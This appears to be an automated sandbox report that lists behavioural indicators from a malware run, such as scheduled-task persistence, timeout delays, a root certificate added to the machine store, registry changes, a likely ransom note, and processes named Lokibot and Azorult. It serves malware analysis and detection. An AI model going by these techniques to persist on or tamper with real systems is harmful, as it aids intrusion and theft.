\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 aurera_dx-1716192337.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4132 schtasks.exe 2968 schtasks.exe 3076 schtasks.exe 1048 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 2940 timeout.exe 1396 timeout.exe 1264 timeout.exe 6592 timeout.exe 2016 timeout.exe 444 timeout.exe 5632 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
WINWORD.EXEWINWORD.EXEWINWORD.EXEchrome.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 6792 ipconfig.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2100 taskkill.exe 3472 taskkill.exe 2816 taskkill.exe 5280 taskkill.exe 6576 taskkill.exe -
Processes:
AcroRd32.exeAcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133606658440816498" chrome.exe -
Modifies registry class 64 IoCs
Processes:
MsiExec.exeOpenWith.exeOpenWith.exeaurera+OTC+install.tmpOpenWith.exeOpenWith.exewinit.exeOpenWith.exewini.exeR8.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = ffffffff MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\md_auto_file\shell\Read OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Applications aurera+OTC+install.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\.json\ = "json_auto_file" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14 MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "14" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Aurera Global OT\\aurera_dx.exe,0" aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\json_auto_file OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Documents" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\json_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\"" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 6c003100000000009a584f6610004f4e454e4f547e310000540009000400efbe9a584f669a5853662e000000902902000000010000000000000000000000000000000691bd004f006e0065004e006f007400650020004e006f007400650062006f006f006b007300000018000000 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13 MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\MIME\Database winit.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\.exe\OpenWithProgids\AureraGlobalOT.exe aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\DefaultIcon aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Aurera Global OT\\aurera_dx.exe\" \"%1\"" aurera+OTC+install.tmp Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "13" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\.exe\OpenWithProgids aurera+OTC+install.tmp Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\ = "Aurera Global OT" aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\shell aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Applications\aurera_dx.exe\SupportedTypes\.myp aurera+OTC+install.tmp Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\json_auto_file\shell\Read OpenWith.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 MsiExec.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "12" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\md_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\"" OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000 MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\shell\open\command aurera+OTC+install.tmp -
Processes:
lyrebird.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 lyrebird.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 lyrebird.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 lyrebird.exe -
NTFS ADS 2 IoCs
Processes:
taskhostw.exeWINWORD.EXEdescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\{0251A466-4239-44FB-B7CF-A66D67D4A45B}\8tr.exe:Zone.Identifier WINWORD.EXE -
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
NOTEPAD.EXENOTEPAD.EXEpid process 5400 NOTEPAD.EXE 1720 NOTEPAD.EXE -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 4424 regedit.exe 4216 regedit.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 5 IoCs
Processes:
WINWORD.EXEWINWORD.EXEWINWORD.EXEpid process 1804 WINWORD.EXE 1804 WINWORD.EXE 756 WINWORD.EXE 756 WINWORD.EXE 3876 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exeaurera+OTC+install.tmpchrome.exelyrebird.exeAcroRd32.exemspaint.exeAcroRd32.exeLokibot.exeAzorult.exepid process 2736 chrome.exe 2736 chrome.exe 1768 aurera+OTC+install.tmp 1768 aurera+OTC+install.tmp 4092 chrome.exe 4092 chrome.exe 5500 lyrebird.exe 5500 lyrebird.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 2396 mspaint.exe 2396 mspaint.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 2124 AcroRd32.exe 5884 Lokibot.exe 5884 Lokibot.exe 5884 Lokibot.exe 5884 Lokibot.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe 1580 Azorult.exe -
Suspicious behavior: GetForegroundWindowSpam 8 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeMsiExec.exetaskhostw.exechrome.exetaskmgr.exepid process 5428 OpenWith.exe 5256 OpenWith.exe 5352 OpenWith.exe 3064 OpenWith.exe 5596 MsiExec.exe 5124 taskhostw.exe 2736 chrome.exe 2264 taskmgr.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 664 664 664 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs
Processes:
